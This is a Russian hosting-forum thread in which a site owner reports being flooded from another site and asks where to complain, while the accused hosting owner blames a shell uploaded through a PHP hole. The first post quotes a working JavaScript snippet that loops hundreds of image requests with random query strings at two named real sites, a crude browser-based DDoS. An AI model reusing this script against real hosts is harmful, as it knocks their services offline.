Форум Сайтостроение Администрирование серверов

Хозяин хостинга не прикрыто ddos-ит конкурентов

12 3
[Удален]
3321

Всем доброго времени суток.

В общем ситуация такая. Недавно я обнаружил, что на мой сайт много переходов с одного и того же адреса. После чего сервер падает.

Посмотрел ту страницу от куда идут переходы http://mxneo.ru/surf.html, там стоит такой скрипт (сейчас он его удалил, но скоро поставит,так всегда): 

<script>

// document.write("<img src='http://promapping.ru//' width='1' height='1' />");

for (i=0;i<=300;i++) {

	document.write("<img src='http://irina.tv/?"+Math.random()+"/' width='1' height='1' />");

}

for (i=0;i<=200;i++) {

	document.write("<img src='http://volgahoster.ru/?"+Math.random()+"/' width='1' height='1' />");

}

</script>

Я узнал, что владелец хостинга http://nghost.in на котором расположен этот сайт, так же является и владельцем этого сайта http://mxneo.ru и поэтому жаловаться как вы понимаете не куда. Хотя о том что данный скрипт стоит на его сайте он прекрасно знает.

Посоветуйте, кому можно пожаловаться, что бы эту "лавочку" прикрыли?

Himiko
На сайте с 28.08.2008
Offline
560
Himiko
#1

Пишите в датацентр abuse@hetzner.de

Профессиональное администрирование серверов (https://systemintegra.ru). Круглосуточно. Отзывы (/ru/forum/834230) Лицензии (http://clck.ru/Qhf5) ISPManager,VDSManager,Billmanager e.t.c. по низким ценам.
[Удален]
#2
Himiko:
Пишите в датацентр abuse@hetzner.de

На английском или немецком?

Raistlin
На сайте с 01.02.2010
Offline
247
Raistlin
#3

Английский тоже сойдёт. Немецкий им роднее.

HostAce - Асы в своем деле (http://hostace.ru)
[Удален]
#4

Спасибо, но страница удалена, спугнул "птицу" блин... нужно было бы без "шума и пыли" катать наверно, как вы думаете?

jcrush
На сайте с 04.07.2004
Offline
371
jcrush
#5

Думаю логи остались у вас, так что написать стоит.

» Блог (http://blog.stfw.ru/) - SEO-заметки. ДВчат: @dvchat (https://t.me/dvchat)
Himiko
На сайте с 28.08.2008
Offline
560
Himiko
#6

Приведите логи подключений к вашему серверу и всю информацию, которой владеете. Что страница появляется периодически и т.п.

[Удален]
#7

Вас понял, спасибо.

neodev
На сайте с 12.11.2011
Offline
9
neodev
#8

Приветствую!

Собственно, зарегистрировался, чтобы дать несколько объяснений случившемуся...

Я владелец сайта mxneo.ru и хостинга nghost. Что могу сказать по этому поводу? Абуза от дц поступила, были приняты меры по исправлению данной ситуации...

Так же, выкладываю переписку, которая произошла поздее, после случившегося инцидента: http://pastebin.com/Ae3XwEvR

Из переписки видно, кулцхакеры через кривой скрипт залили шелл, и собственно, рулили сайтом и аккаунтом на хостинге...

Я знал про существование этого файла, и собственно я и администраторы сайта использовали его для накрутки счетчиков через web serf системы, но то что он был изменен вне моего ведома информации небыло. Так как на папку небыло прав записи, записали вредоносный скрипт предоставленный ТС в данный файл, так как на него были поставлены права доступа 777.

[ng-host.ru (http://ng-host.ru/)] - [divku.ru (http://divku.ru/)] - [cliku.ru (http://cliku.ru/)]
GoDaddy отключил 15 000 WhatsApp усилит защиту аккаунта Все, что вам нужно
Himiko
На сайте с 28.08.2008
Offline
560
Himiko
#9
Я владелец сайта mxneo.ru и хостинга nghost
так как на него были поставлены права доступа 777.

Не стыкуется как-то. Права 777 вообще никогда нормально настроенному серверу не требуются. Это большая "дырка". Да и остальное тоже... включая сам инцидент.

http://pastebin.com/Ae3XwEvR

Это вообще жесть... Сервер администрируется видимо вами же?

Ладно взлом одного аккаунта или сайта, но выкладывать в паблик информацию, что ваш сервер не настроен толком - это жесть.

Может лучше стоило администратора нанять, а здесь извиниться, что сайт был взломан?

Более 6 тысяч сайтов Правила он-лайн безопасности от Джон Мюллер о восстановлении
neodev
На сайте с 12.11.2011
Offline
9
neodev
#10
neodev:

Я знал про существование этого файла, и собственно я и администраторы сайта использовали его для накрутки счетчиков

neodev добавил 12.11.2011 в 05:04

Himiko:

Это вообще жесть... Сервер администрируется видимо вами же?
Ладно взлом одного аккаунта или сайта, но выкладывать в паблик информацию, что ваш сервер не настроен толком - это жесть.
Может лучше стоило администратора нанять, а здесь извиниться, что сайт был взломан?

Тут не настройки сервера, а дыра в php скрипте...

neodev добавил 12.11.2011 в 05:09

Himiko:

Ладно взлом одного аккаунта или сайта, но выкладывать в паблик информацию, что ваш сервер не настроен толком - это жесть.

Уважаемый, почему вы считаете что сервер плохо настроен?

Слова человека, из переписки, который напрямую залил файл через форму загрузки, подобрал имя файла в папке uploads, и который говорит что это дырка в сервере, не могут приниматься всерьез.

Он смог навредить только одному аккаунту. До соседей на сервере никак нельзя достучаться, а от кривых рук администраторов сайтов, не знающих про безопасность и права доступа никто не застрахован. И еще раз повторяю что сайтом mxneo управляли несколько человек, а не только я...

С уважением, Дмитрий.

Расширенные кампании AdWords - Как выбрать хостинг: часто «Играем в доктора»: неправильное
12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий